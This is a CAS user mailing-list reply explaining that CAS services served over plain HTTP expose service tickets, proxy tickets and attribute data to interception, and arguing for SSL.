> I want to check the risk scenario for authorizing CAS services that are not > behind SSL, e.g. http://example.com/casapp > Is the scenario that someone might intercept the ticket from the redirect to > the users browser?
I believe that's the most common concern, yes, but certainly not the only one. All the data that flows over the connection is liable to interception, including potentially sensitive data returned by the CAS server like proxy tickets and attribute release payload. With tools like FireSheep interception of data like this over wifi networks is trivially easy, so disclosure of this kind of data should be of considerable concern. My standard rhetorical question for these cases: Why bother with authentication if the subsequent data is trivially difficult to steal? M -- You are currently subscribed to [email protected] as: [email protected] To unsubscribe, change settings or access archives, see http://www.ja-sig.org/wiki/display/JSG/cas-user
